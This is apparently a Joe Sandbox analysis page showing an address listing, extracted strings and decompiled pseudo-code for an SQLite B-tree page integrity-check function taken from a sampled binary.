0x00ddfb70
0x00ddfb70
0x00ddfb72
0x00ddfb73
0x00ddfb73
0x00ddfb79
0x00ddfb79
0x00ddfb67
0x00ddfb67
0x00ddfb67
0x00ddfb7f
0x00ddfb8c
0x00ddfb8e
0x00ddfb91
0x00ddfb93
0x00ddfb9a
0x00ddfba2
0x00ddfba5
0x00ddfba9
0x00ddfbac
0x00ddfbac
0x00ddfbaf
0x00ddfbb2
0x00ddfbb4
0x00ddfbb9
0x00ddfbbe
0x00ddfbc1
0x00ddfbc1
0x00ddfbc4
0x00ddfbc8
0x00ddfbc8
0x00ddfbcf
0x00ddfbd7
0x00ddfbe0
0x00ddfbe2
0x00ddfbe5
0x00ddfbe9
0x00ddfbeb
0x00ddfc16
0x00ddfc18
0x00ddfc1e
0x00ddfc1e
0x00ddfc23
0x00ddfc27
0x00ddfc29
0x00ddfbed
0x00ddfbed
0x00ddfbf0
0x00ddfbf3
0x00ddfbf9
0x00ddfbfd
0x00ddfc04
0x00ddfc07
0x00ddfc09
0x00ddfc10
0x00ddfc10
0x00ddfc52
0x00ddfc52
0x00ddfc54
0x00ddfc54
0x00ddfc56
0x00ddfc58
0x00ddfc58
0x00ddfc60
0x00ddfc60
0x00ddfc62
0x00ddfc65
0x00ddfc67
0x00ddfc6a
0x00ddfc6c
0x00ddfc6e
0x00ddfc71
0x00ddfc71
0x00ddfc73
0x00ddfc74
0x00ddfc74
0x00ddfc7a
0x00ddfc7a
0x00ddfc7a
0x00ddfc85
0x00ddfc85
0x00ddfc87
0x00ddfc87
0x00ddfc8b
0x00ddfc8e
0x00ddfc8e
0x00ddfc8e
0x00ddfc60
0x00ddfc93
0x00ddfc97
0x00ddfc9a
0x00ddfca0
0x00ddfca0
0x00ddfca2
0x00ddfca3
0x00ddfca3
0x00ddfca7
0x00ddfcad
0x00ddfcb3
0x00ddfcb5
0x00ddfcbd
0x00ddfcb7
0x00ddfcb7
0x00ddfcb7
0x00ddfce2
0x00ddfce4
0x00ddfce7
0x00ddfceb
0x00ddfcef
0x00ddfcf3
0x00de0681
0x00000000
0x00ddfcf9
0x00ddfcf9
0x00ddfcfd
0x00ddfd02
0x00ddfd0c
0x00ddfd12
0x00ddfd1b
0x00ddfd1e
0x00ddfd22
0x00ddfd27
0x00ddfd2a
0x00ddfd47
0x00ddfd55
0x00ddfd59
0x00ddfd63
0x00ddfd67
0x00ddfd69
0x00ddfd70
0x00ddfd72
0x00ddfd7b
0x00ddfd7e
0x00ddfd82
0x00ddfd85
0x00ddfd87
0x00ddfd87
0x00ddfd8f
0x00ddfd91
0x00ddfd9b
0x00ddfd9f
0x00ddfda3
0x00ddfda6
0x00ddfdaa
0x00ddfdac
0x00ddffaa
0x00ddffaa
0x00ddffae
0x00ddffb0
0x00de00ce
0x00de00d5
0x00ddffb6
0x00ddffb8
0x00ddffba
0x00ddffbe
0x00ddffc0
0x00ddffc4
0x00ddffc7
0x00ddffcb
0x00ddffce
0x00ddffd0
0x00ddffd4
0x00ddffd6
0x00ddffec
0x00ddffec
0x00ddfff0
0x00ddfff4
0x00ddfff8
0x00de0005
0x00de0011
0x00de0014
0x00de0014
0x00de0015
0x00ddffd8
0x00ddffd8
0x00ddffd8
0x00ddffdb
0x00ddffde
0x00ddffdf
0x00ddffe2
0x00000000
0x00000000
0x00ddffe8
0x00ddffea
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00ddffea
0x00de00b2
0x00de00bb
0x00de00bf
0x00de00bf
0x00de0019
0x00de001d
0x00de001e
0x00de001e
0x00ddffc4
0x00de0022
0x00de0022
0x00de0028
0x00de002d
0x00de0031
0x00de0038
0x00de003c
0x00de003c
0x00de0041
0x00de0046
0x00de004a
0x00de0050
0x00de0058
0x00de005a
0x00de0060
0x00de0064
0x00de0069
0x00de006d
0x00de0071
0x00de0073
0x00de00f2
0x00de00f2
0x00de0075
0x00de0075
0x00de0080
0x00de0080
0x00de0082
0x00000000
0x00de0084
0x00de0084
0x00de0086
0x00de0088
0x00de009e
0x00de009e
0x00de00a6
0x00de00ad
0x00de008a
0x00de008e
0x00de0091
0x00de0091
0x00de0094
0x00000000
0x00000000
0x00de0096
0x00de0097
0x00de009a
0x00de009c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00de009c
0x00de00e4
0x00de00e7
0x00000000
0x00000000
0x00000000
0x00000000
0x00de00e7
0x00de0088
0x00000000
0x00de00e9
0x00de00e9
0x00de00ea
0x00de00ea
0x00de00ee
0x00000000
0x00de00ee
0x00de0073
0x00de005a
0x00de00f6
0x00de00f6
0x00de00fa
0x00de0100
0x00de01dd
0x00de01dd
0x00de01e1
0x00de01e8
0x00de02d6
0x00de02da
0x00de02e7
0x00de02e7
0x00de02ea
0x00de02ed
0x00de02f0
0x00de02f2
0x00de031a
0x00de031a
0x00de031f
0x00de0326
0x00de0329
0x00de032d
0x00de032f
0x00de0332
0x00de0334
0x00de0336
0x00de0339
0x00de033c
0x00de033f
0x00de0343
0x00de0348
0x00de033f
0x00de034f
0x00de0353
0x00de035c
0x00de0362
0x00de0365
0x00de0383
0x00de0389
0x00de038c
0x00de038f
0x00de0396
0x00de039e
0x00de03a6
0x00de03ae
0x00de0367
0x00de0374
0x00de0379
0x00de037c
0x00de037c
0x00de03ba
0x00de03c0
0x00de03c6
0x00de03c9
0x00de03ea
0x00de03f0
0x00de03f3
0x00de03f6
0x00de03fd
0x00de0401
0x00de0405
0x00de040d
0x00de03cb
0x00de03d9
0x00de03de
0x00de03de
0x00de0415
0x00de0419
0x00de046b
0x00de046b
0x00de041b
0x00de042f
0x00de0431
0x00de0435
0x00de0437
0x00de0438
0x00de043f
0x00de0442
0x00de0447
0x00de0452
0x00de045f
0x00de0464
0x00de0467
0x00de0467
0x00de0475
0x00de0476
0x00de0477
0x00de047d
0x00de0483
0x00de0497
0x00de049c
0x00de049f
0x00de04a1
0x00de04a3
0x00de04a7
0x00de04ae
0x00de04b9
0x00de04bf
0x00de04d9
0x00de04da
0x00de04df
0x00de04c1
0x00de04c1
0x00de04c7
0x00000000
0x00de04c9
0x00de04cf
0x00de04d1
0x00de04d1
0x00de04c7
0x00de04b0
0x00de04b2
0x00de04b2
0x00de04ae
0x00de04e2
0x00de04e7
0x00de05ee
0x00de04ed
0x00de04f2
0x00de04f8
0x00de04ff
0x00de0506
0x00de0510
0x00de051b
0x00de051c
0x00de051f
0x00de053c
0x00de0542
0x00de0545
0x00de054c
0x00de0553
0x00de0557
0x00de055f
0x00de0563
0x00de0521
0x00de052f
0x00de0534
0x00de0534
0x00de056b
0x00de0589
0x00de0591
0x00de0594
0x00de059a
0x00de059d
0x00de05b9
0x00de05bf
0x00de05c2
0x00de05c5
0x00de05cc
0x00de05d4
0x00de05dc
0x00de05e4
0x00de059f
0x00de05ac
0x00de05b1
0x00de05b1
0x00de059d
0x00de05f2
0x00de05f4
0x00de05fa
0x00de05fd
0x00de0601
0x00de060a
0x00de060f
0x00de0612
0x00de0618
0x00de0603
0x00de0603
0x00de0603
0x00de061b
0x00de061f
0x00de0623
0x00000000
0x00de02f4
0x00de02f4
0x00de02f7
0x00de02fb
0x00de02ff
0x00de0301
0x00de0301
0x00de02ff
0x00de030c
0x00de030e
0x00de0310
0x00000000
0x00de0316
0x00de0316
0x00000000
0x00de0316
0x00de0310
0x00de02dc
0x00de02dc
0x00de02e1
0x00de0626
0x00de0626
0x00000000
0x00000000
0x00000000
0x00000000
0x00de02e1
0x00de01ee
0x00de01f7
0x00de01fc
0x00de01ff
0x00de0201
0x00de02b4
0x00de02b8
0x00de02bc
0x00de02c0
0x00de02c2
0x00de02ce
0x00de02ce
0x00de062a
0x00de062a
0x00de0631
0x00de0637
0x00de0637
0x00de063c
0x00de066f
0x00de066f
0x00de0676
0x00de0679
0x00000000
0x00de063e
0x00de063e
0x00de0641
0x00de0643
0x00000000
0x00de0645
0x00de0645
0x00de0649
0x00000000
0x00de064b
0x00de064b
0x00de064e
0x00de0650
0x00de0652
0x00de0652
0x00de0656
0x00000000
0x00000000
0x00de0658
0x00de065a
0x00de065d
0x00de065f
0x00000000
0x00000000
0x00000000
0x00de065f
0x00de0652
0x00de0661
0x00de0664
0x00de0667
0x00000000
0x00de0667
0x00de0649
0x00de0643
0x00de0633
0x00de0633
0x00de0635
0x00000000
0x00000000
0x00000000
0x00000000
0x00de0635
0x00de0207
0x00de0207
0x00de020b
0x00de0211
0x00de0215
0x00de021b
0x00de0222
0x00de0226
0x00de0228
0x00de0228
0x00de0232
0x00de0232
0x00de0215
0x00000000
0x00de020b
0x00de0201
0x00de0106
0x00de0106
0x00de0109
0x00de010d
0x00de010f
0x00de0115
0x00de0120
0x00de0120
0x00de0124
0x00de0127
0x00000000
0x00de012d
0x00de012d
0x00de012f
0x00de0131
0x00de0135
0x00de0139
0x00de013b
0x00de0140
0x00de0143
0x00de0143
0x00de0145
0x00de0150
0x00de0154
0x00de0157
0x00000000
0x00000000
0x00de015c
0x00de0163
0x00de0168
0x00de016b
0x00de0175
0x00de017f
0x00de0181
0x00de01aa
0x00de01aa
0x00de01ae
0x00de01b2
0x00de0183
0x00de0183
0x00de0183
0x00de0185
0x00de0185
0x00de0187
0x00000000
0x00000000
0x00de018d
0x00de0192
0x00de019a
0x00de019c
0x00de01a6
0x00de01a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00de01a8
0x00de0241
0x00de0244
0x00de0248
0x00de0249
0x00de024d
0x00de0251
0x00de0255
0x00de0257
0x00000000
0x00000000
0x00de025d
0x00de0257
0x00000000
0x00de0181
0x00de01b6
0x00de01b6
0x00de01b6
0x00de01ba
0x00de01bc
0x00de0262
0x00de0265
0x00de0268
0x00de026a
0x00de026c
0x00de026e
0x00de028f
0x00de0292
0x00de0270
0x00de0270
0x00de0273
0x00de0280
0x00de0288
0x00de028b
0x00de028d
0x00000000
0x00000000
0x00de028d
0x00de0273
0x00de026e
0x00de0295
0x00de0299
0x00de029d
0x00de02ac
0x00de02ac
0x00000000
0x00de01c2
0x00de01c2
0x00000000
0x00de01c2
0x00de01bc
0x00000000
0x00de01c6
0x00de01c6
0x00de01c9
0x00de01cd
0x00de01cd
0x00de01d5
0x00de01d9
0x00de01d9
0x00000000
0x00de010f
0x00ddfdb2
0x00ddfdb2
0x00ddfdb6
0x00ddfdb6
0x00ddfdb8
0x00ddfdba
0x00ddfdbd
0x00000000
0x00000000
0x00ddfdbf
0x00ddfdc2
0x00ddfdc4
0x00ddfdc7
0x00ddfdca
0x00000000
0x00000000
0x00ddfdca
0x00ddfdcf
0x00ddfdd9
0x00ddfdde
0x00ddfde2
0x00ddfde5
0x00ddfde9
0x00ddffa1
0x00ddffa1
0x00de0683
0x00de0683
0x00de0687
0x00de0689
0x00de0693
0x00de0693
0x00000000
0x00ddfdef
0x00ddfdef
0x00ddfdf1
0x00ddfdf3
0x00ddfdf5
0x00ddfdf5
0x00ddfdf8
0x00ddfdfe
0x00000000
0x00000000
0x00ddfe00
0x00ddfe06
0x00ddfe10
0x00ddfe08
0x00ddfe0b
0x00ddfe0b
0x00ddfe13
0x00ddfe15
0x00000000
0x00000000
0x00000000
0x00ddfe15
0x00ddfe17
0x00ddfe17
0x00ddfe1b
0x00ddfe1e
0x00ddfe76
0x00ddfe7a
0x00ddfe7e
0x00ddfe80
0x00ddfe88
0x00ddfe8d
0x00ddfe8f
0x00ddfe94
0x00ddfe96
0x00ddfe96
0x00ddfe96
0x00ddfe96
0x00ddfe82
0x00ddfe82
0x00ddfe82
0x00ddfe9d
0x00000000
0x00ddfe20
0x00ddfe24
0x00ddfe2a
0x00ddff93
0x00ddff98
0x00ddff99
0x00ddff9e
0x00000000
0x00ddfe30
0x00ddfe30
0x00ddfe34
0x00ddfe40
0x00ddfe45
0x00ddfe49
0x00ddfe4c
0x00ddfe4f
0x00ddfe53
0x00ddfe5c
0x00ddfe5c
0x00ddfe5e
0x00ddfe5e
0x00ddfe53
0x00ddfe65
0x00ddfe6c
0x00ddfe70
0x00ddfea1
0x00ddfea1
0x00ddfea3
0x00ddfea6
0x00ddfee4
0x00ddfee6
0x00000000
0x00ddfee8
0x00ddfeec
0x00ddfeec
0x00ddfef1
0x00000000
0x00ddfef1
0x00ddfea8
0x00ddfea8
0x00ddfeab
0x00ddfead
0x00ddfeb3
0x00ddfeb5
0x00ddfeb8
0x00ddfeb8
0x00ddfeba
0x00ddfebb
0x00ddfebb
0x00ddfec1
0x00ddfec1
0x00ddfeaf
0x00ddfeaf
0x00ddfeaf
0x00ddfec7
0x00ddfecb
0x00ddfecf
0x00ddfed7
0x00ddfeda
0x00ddfede
0x00ddfef5
0x00ddfef5
0x00ddfef7
0x00ddfef9
0x00ddfef9
0x00ddfef9
0x00ddfef7
0x00ddfefe
0x00ddff02
0x00ddff09
0x00ddff4f
0x00ddff56
0x00ddff5f
0x00ddff64
0x00ddff68
0x00ddff6b
0x00ddff70
0x00ddff73
0x00ddff7a
0x00ddff7d
0x00ddff82
0x00ddff86
0x00ddff88
0x00000000
0x00ddff8a
0x00ddff8a
0x00000000
0x00ddff8a
0x00ddff0b
0x00ddff17
0x00ddff21
0x00ddff26
0x00ddff29
0x00ddff2b
0x00ddff47
0x00ddff47
0x00ddff49
0x00000000
0x00000000
0x00000000
0x00000000
0x00ddff2d
0x00ddff2d
0x00ddff2f
0x00ddff37
0x00ddff3f
0x00ddff44
0x00000000
0x00ddff31
0x00ddff31
0x00ddff35
0x00ddff4b
0x00ddff4b
0x00000000
0x00000000
0x00000000
0x00000000
0x00ddff35
0x00ddff2f
0x00ddff2b
0x00ddff09
0x00ddfe2a
0x00ddfe1e
0x00000000
0x00ddfdcc
0x00ddfdcc
0x00000000
0x00ddfdcc
0x00ddfdb6
0x00ddfdac
0x00ddfcf3
0x00ddfbeb
0x00ddfb50
0x00ddfb44
0x00ddf9f9
0x00ddf9f9
0x00ddf9fd
0x00ddfa18
0x00ddfa20
0x00ddfa24
0x00ddfa26
0x00ddfa29
0x00ddfa2b
0x00ddfa2e
0x00ddfa30
0x00ddfa32
0x00ddfa35
0x00ddfa38
0x00ddfa3b
0x00ddfa3f
0x00ddfa3f
0x00ddfa3b
0x00ddfa44
0x00ddfa46
0x00ddfa46
0x00ddf9ff
0x00ddf9ff
0x00ddfa0a
0x00ddfa0f
0x00ddfa13
0x00ddfa13
0x00000000
0x00ddf9fd
0x00ddf9b9
0x00ddf9be
0x00ddf9c3
0x00ddf9c6
0x00ddf9c8
0x00000000
0x00ddf9ca
0x00ddf9d1
0x00ddf9d6
0x00000000
0x00ddf9d6
0x00ddf9c8
0x00ddf9b7
0x00ddf9ab
0x00ddf949
0x00ddf949
0x00ddf94b
0x00ddf950
0x00ddf950
0x00000000
0x00ddf950
0x00ddf947
0x00ddf92d
0x00ddf92d
0x00000000
0x00ddf92d
0x00ddf90b
0x00ddf90b
0x00ddf910
0x00ddf910
0x00ddf914
0x00ddf919
0x00ddf91d
0x00ddf920
0x00000000
0x00ddf920
0x00000000
0x00000000
0x00000000
0x00ddf86c
0x00ddf854
0x00ddf762
0x00ddf762
0x00ddf76c
0x00ddf76f
0x00000000
0x00ddf771
0x00ddf779
0x00ddf77e
0x00ddf781
0x00000000
0x00ddf781
0x00ddf76f
0x00ddf760
0x00ddf619
0x00ddf619
0x00ddf620
0x00ddf63d
0x00ddf643
0x00ddf648
0x00ddf64c
0x00ddf64e
0x00ddf66a
0x00000000
0x00ddf650
0x00ddf657
0x00ddf65c
0x00ddf660
0x00ddf663
0x00000000
0x00ddf663
0x00ddf622
0x00ddf622
0x00ddf627
0x00ddf628
0x00ddf62d
0x00ddf631
0x00ddf634
0x00000000
0x00ddf634
0x00ddf620
0x00ddf617
0x00ddf5e2
0x00ddf5e7
0x00ddf5ee
0x00ddf601
0x00ddf605
0x00000000
0x00ddf5f0
0x00ddf5f0
0x00ddf5f3
0x00ddf5f6
0x00ddf5f6
0x00ddf5fa
0x00ddfa4a
0x00ddfa4a
0x00ddfa4a
0x00ddf5ee
0x00ddf5e0
0x00ddfa4e
0x00ddfa4e
0x00ddfa54
0x00ddfa5a
0x00ddfa5a
0x00ddfa61
0x00ddfa67
0x00ddfa67
0x00ddfa6c
0x00ddfa72
0x00ddfa79
0x00de06e8
0x00de06ec
0x00de06ed
0x00de06ee
0x00de06ef
0x00de06f9
0x00ddfa7f
0x00ddfa86
0x00de06af
0x00de06b5
0x00de06df
0x00de06e0
0x00de06e5
0x00000000
0x00de06b7
0x00de06b7
0x00de06bd
0x00000000
0x00de06bf
0x00de06c5
0x00de06c7
0x00de06cd
0x00de06ce
0x00de06cf
0x00de06d4
0x00de06de
0x00de06de
0x00de06bd
0x00ddfa8c
0x00ddfa90
0x00ddfa95
0x00ddfa96
0x00ddfa97
0x00ddfaa6
0x00ddfaa6
0x00ddfa86

Strings

sqlite_temp_master, xrefs: 00DDFAEF
sqlite_autoindex_%s_%d, xrefs: 00DDFABD
name='%q' AND type='index', xrefs: 00DE0571
BINARY, xrefs: 00DDFEF9, 00DDFF20, 00DDFF3D, 00DE00D5
sqlite_master, xrefs: 00DDFAF9, 00DDFB09, 00DE0483
virtual tables may not be indexed, xrefs: 00DDF92D
altertab_, xrefs: 00DDF887
corrupt database, xrefs: 00DDF622
there is already a table named %s, xrefs: 00DDF9CB
too many columns in %s, xrefs: 00DDFC40
views may not be indexed, xrefs: 00DDF90B
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);, xrefs: 00DE048E
UNIQUE, xrefs: 00DE0448
CREATE%s INDEX %.*s, xrefs: 00DE0456
conflicting ON CONFLICT clauses specified, xrefs: 00DE0277
sqlite_, xrefs: 00DDF829
unknown database %T, xrefs: 00DDF651
table %s may not be indexed, xrefs: 00DDF8CF
index, xrefs: 00DDF6D0, 00DDFC3B
expressions prohibited in PRIMARY KEY and UNIQUE constraints, xrefs: 00DDFF93
cannot create a TEMP index on non-TEMP table "%s", xrefs: 00DDF773
index %s already exists, xrefs: 00DDFA04

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: UNIQUE$BINARY$CREATE%s INDEX %.*s$INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);$altertab_$cannot create a TEMP index on non-TEMP table "%s"$conflicting ON CONFLICT clauses specified$corrupt database$expressions prohibited in PRIMARY KEY and UNIQUE constraints$index$index %s already exists$name='%q' AND type='index'$sqlite_$sqlite_autoindex_%s_%d$sqlite_master$sqlite_temp_master$table %s may not be indexed$there is already a table named %s$too many columns in %s$unknown database %T$views may not be indexed$virtual tables may not be indexed
API String ID: 0-4131144391
Opcode ID: 791de6f9ef4409a5fecc01bd04716670cf6604551e08c10dbcf5ce5db2c8fd47
Instruction ID: ab35d1c0bf003c1b4cadcc2279aa825cfc511eabb99ac56f0090bcd5b1588e19
Opcode Fuzzy Hash: 791de6f9ef4409a5fecc01bd04716670cf6604551e08c10dbcf5ce5db2c8fd47
Instruction Fuzzy Hash: 05C2E2716043418FC724DF29C490B2ABBE2FF89314F19456EE88A9B352D771EC56CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DB2690 Relevance: 16.9, Strings: 13, Instructions: 686
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00DB2690(intOrPtr* __ecx, unsigned int __edx, intOrPtr* _a4, char _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v18;
				signed short _v20;
				intOrPtr _v24;
				intOrPtr _v32;
				char _v36;
				char _v40;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr* _v56;
				signed int _v60;
				char _v64;
				signed int _v68;
				char _v72;
				intOrPtr* _v76;
				intOrPtr* _v80;
				signed int* _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr* _v112;
				signed short _v116;
				signed short _v120;
				intOrPtr _v124;
				char _v125;
				void* _v126;
				signed int _v132;
				char* _v136;
				signed int _v140;
				void* _v141;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t290;
				intOrPtr* _t296;
				signed int _t301;
				intOrPtr _t302;
				signed int _t304;
				signed int _t307;
				intOrPtr _t308;
				intOrPtr _t309;
				signed int _t319;
				intOrPtr _t329;
				void* _t331;
				intOrPtr _t334;
				signed short _t337;
				signed int _t341;
				unsigned int _t346;
				signed int _t355;
				signed short _t356;
				signed int _t362;
				intOrPtr _t369;
				signed short _t371;
				signed int _t377;
				signed int _t379;
				void* _t382;
				intOrPtr* _t386;
				intOrPtr _t387;
				intOrPtr _t392;
				intOrPtr _t393;
				signed int _t399;
				intOrPtr _t401;
				signed int _t407;
				intOrPtr _t408;
				intOrPtr _t416;
				signed int _t420;
				intOrPtr _t421;
				intOrPtr _t425;
				intOrPtr _t428;
				signed int _t430;
				signed int _t433;
				signed int _t434;
				signed int _t440;
				signed int _t443;
				void* _t453;
				void* _t454;
				intOrPtr _t455;
				signed int _t457;
				void* _t458;
				signed int _t464;
				intOrPtr _t465;
				signed int _t485;
				signed int _t487;
				signed int _t488;
				signed int _t490;
				signed int _t493;
				signed int _t497;
				signed int _t500;
				void* _t504;
				signed int _t506;
				signed int _t509;
				signed char _t512;
				signed char _t517;
				char _t518;
				signed char _t522;
				signed int _t526;
				char* _t528;
				intOrPtr _t529;
				signed char _t530;
				signed int _t532;
				char* _t533;
				signed int _t536;
				signed int _t537;
				signed int _t540;
				signed int _t543;
				intOrPtr _t544;
				signed int _t545;
				signed int* _t546;
				intOrPtr _t548;
				signed int _t549;
				void* _t559;
				signed char* _t562;
				intOrPtr* _t563;
				signed int _t564;
				intOrPtr* _t565;
				void* _t566;
				signed int _t568;
				signed int _t569;
				signed short _t570;
				signed int _t571;
				signed int _t572;
				signed int _t574;
				signed int _t575;
				intOrPtr _t576;
				signed int _t577;
				intOrPtr _t578;
				signed int _t579;
				intOrPtr _t581;
				intOrPtr _t582;
				void* _t583;
				signed int* _t585;
				void* _t586;
				void* _t587;
				intOrPtr* _t588;
				void* _t589;
				signed int _t590;
				signed int _t592;
				signed int _t593;

				_t525 = __edx;
				_t592 = (_t590 & 0xfffffff8) - 0x8c;
				_t290 =  *0xed8944; // 0xccebfc3b
				_v8 = _t290 ^ _t592;
				_t452 = __ecx;
				_v56 = _a4;
				_t585 = 0;
				_v140 = __edx;
				_v76 = __ecx;
				_v52 =  *(__ecx + 0x1c);
				_v48 =  *((intOrPtr*)(__ecx + 0x20));
				_v44 =  *((intOrPtr*)(__ecx + 0x24));
				_t296 =  *__ecx;
				_v112 = _t296;
				_v96 = 0xffffffff;
				_v88 = 1;
				_v108 = 1;
				_v104 =  *((intOrPtr*)(_t296 + 0x24));
				if(__edx == 0) {
					L5:
					_pop(_t559);
					_pop(_t586);
					_pop(_t453);
					__eflags = _v8 ^ _t592;
					return E00E76672(0, _t453, _v8 ^ _t592, _t525, _t559, _t586);
				} else {
					if(__edx <=  *((intOrPtr*)(__ecx + 0xc))) {
						_t562 = (__edx >> 3) +  *((intOrPtr*)(__ecx + 8));
						_t301 = 1 << (_v140 & 0x00000007);
						_t526 =  *_t562 & 0x000000ff;
						__eflags = _t526 & _t301;
						if((_t526 & _t301) == 0) {
							asm("bts edx, ecx");
							_t464 = _v140;
							 *_t562 = _t526;
							_t527 =  &_v40;
							_t563 = _v112;
							 *(__ecx + 0x1c) = "Page %d: ";
							 *((intOrPtr*)(__ecx + 0x20)) = _t464;
							_t302 =  *_t563;
							_t304 =  *((intOrPtr*)( *((intOrPtr*)(_t302 + 0xc8))))(_t302, _t464,  &_v40, 0);
							_t593 = _t592 + 0x10;
							__eflags = _t304;
							if(_t304 == 0) {
								_t465 = _v40;
								_t528 =  *((intOrPtr*)(_t465 + 8));
								_v136 = _t528;
								__eflags = _v140 -  *(_t528 + 4);
								if(_v140 !=  *(_t528 + 4)) {
									 *((intOrPtr*)(_t528 + 0x38)) =  *((intOrPtr*)(_t465 + 4));
									_t440 = _v140;
									__eflags = _t440 - 1;
									 *(_t528 + 4) = _t440;
									 *((intOrPtr*)(_t528 + 0x48)) = _t465;
									 *((intOrPtr*)(_t528 + 0x34)) = _t563;
									_t443 = (_t440 & 0xffffff00 | _t440 != 0x00000001) - 0x00000001 & 0x00000064;
									__eflags = _t443;
									 *(_t528 + 9) = _t443;
								}
								_v125 =  *_t528;
								 *_t528 = 0;
								_t307 = E00DA81F0(_t528);
								__eflags = _t307;
								if(_t307 == 0) {
									_t529 = _v136;
									_t308 =  *((intOrPtr*)(_t529 + 0x38));
									_t564 =  *(_t529 + 9) & 0x000000ff;
									_v124 = _t308;
									_t309 = _t308 + _t564;
									_v100 = _t309;
									 *(_t452 + 0x1c) = "On tree page %d cell %d: ";
									_t530 =  *((intOrPtr*)(_t529 + 8));
									_v120 = (( *(_t309 + 5) & 0x000000ff) << 0x00000008 |  *(_t309 + 6) & 0x000000ff) - 0x00000001 & 0x0000ffff;
									_v132 = ( *(_v100 + 3) & 0x000000ff) << 0x00000008 |  *(_v100 + 4) & 0x000000ff;
									_v116 = _t564 + (3 - (_t530 & 0x000000ff)) * 4;
									_v84 = 3 + _v132 * 2 + 0xfffffffe + _v124;
									__eflags = _t530;
									if(_t530 != 0) {
										_t585 =  *(_t452 + 0x40);
										 *_t585 = 0;
									} else {
										_t428 = _v112;
										_t582 =  *((intOrPtr*)(_v100 + 8));
										asm("bswap edi");
										__eflags =  *((intOrPtr*)(_t428 + 0x11)) - _t530;
										if( *((intOrPtr*)(_t428 + 0x11)) != _t530) {
											 *(_t452 + 0x1c) = "On page %d at right child: ";
											_t433 = E00DA7470( *_t452, _t582,  &_v141,  &_v92);
											_t593 = _t593 + 8;
											__eflags = _t433;
											if(_t433 == 0) {
												_t522 = _v141;
												_t434 = _v92;
												__eflags = _t522 - 5;
												if(_t522 != 5) {
													L24:
													_push(_t434);
													_push(_t522 & 0x000000ff);
													_push(_v140);
													_push(5);
													E00DB21F0(_t452, "Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)", _t582);
													_t593 = _t593 + 0x1c;
												} else {
													__eflags = _t434 - _v140;
													if(_t434 != _v140) {
														goto L24;
													}
												}
											} else {
												__eflags = _t433 - 7;
												if(_t433 == 7) {
													L20:
													 *(_t452 + 0x18) = 1;
												} else {
													__eflags = _t433 - 0xc0a;
													if(_t433 == 0xc0a) {
														goto L20;
													}
												}
												E00DB21F0(_t452, "Failed to read ptrmap key=%d", _t582);
												_t593 = _t593 + 0xc;
											}
										}
										_t430 = E00DB2690(_t452, _t582,  &_a8, _a8, _a12);
										_t593 = _t593 + 0xc;
										_v96 = _t430;
										_v108 = _t585;
									}
									_t532 = _v132 - 1;
									__eflags = _t532;
									_v132 = _t532;
									_t319 = _t532;
									_v92 = _t532;
									if(_t532 >= 0) {
										while(1) {
											__eflags =  *(_t452 + 0x10);
											if( *(_t452 + 0x10) == 0) {
												break;
											}
											_t546 = _v84;
											 *(_t452 + 0x24) = _t319;
											_v84 = _t546 - 2;
											_t575 =  *_t546 & 0x0000ffff;
											_t382 = _v104 + 0xfffffffc;
											_t504 = _v120 + 1;
											_v60 = _t575;
											__eflags = _t575 - _t504;
											if(_t575 < _t504) {
												L72:
												_push(_t382);
												_push(_t504);
												E00DB21F0(_t452, "Offset %d out of range %d..%d", _t575);
												_t593 = _t593 + 0x14;
												goto L73;
											} else {
												__eflags = _t575 - _t382;
												if(_t575 > _t382) {
													goto L72;
												} else {
													_t386 = _v124 + _t575;
													_v80 = _t386;
													_t387 = _v136;
													 *((intOrPtr*)( *((intOrPtr*)(_t387 + 0x50))))(_t387, _t386,  &_v36);
													_t593 = _t593 + 0xc;
													_t576 = _v104;
													__eflags = (_v18 & 0x0000ffff) + _t575 - _t576;
													if((_v18 & 0x0000ffff) + _t575 <= _t576) {
														_t548 = _v136;
														__eflags =  *((char*)(_t548 + 2));
														if( *((char*)(_t548 + 2)) != 0) {
															__eflags = _v108;
															_t518 = _v36;
															_t425 = _v32;
															if(_v108 == 0) {
																__eflags = _t425 - _a12;
																if(__eflags >= 0) {
																	if(__eflags > 0) {
																		goto L43;
																	} else {
																		__eflags = _t518 - _a8;
																		if(_t518 >= _a8) {
																			goto L43;
																		}
																	}
																}
															} else {
																__eflags = _t425 - _a12;
																if(__eflags >= 0) {
																	if(__eflags > 0) {
																		L43:
																		_push(_t425);
																		E00DB21F0(_t452, "Rowid %lld out of order", _t518);
																		_t425 = _v32;
																		_t593 = _t593 + 0x10;
																		_t518 = _v36;
																	} else {
																		__eflags = _t518 - _a8;
																		if(_t518 > _a8) {
																			goto L43;
																		}
																	}
																}
															}
															_a8 = _t518;
															_a12 = _t425;
															_v108 = 0;
														}
														_t506 = _v20 & 0x0000ffff;
														_t392 = _v24;
														__eflags = _t392 - _t506;
														if(_t392 > _t506) {
															_v68 = (_t392 - _t506 + 0xfffffffb + _t576) / (_t576 - 4);
															_t416 = _v112;
															_t581 =  *((intOrPtr*)((_v18 & 0x0000ffff) + _v80 - 4));
															asm("bswap edi");
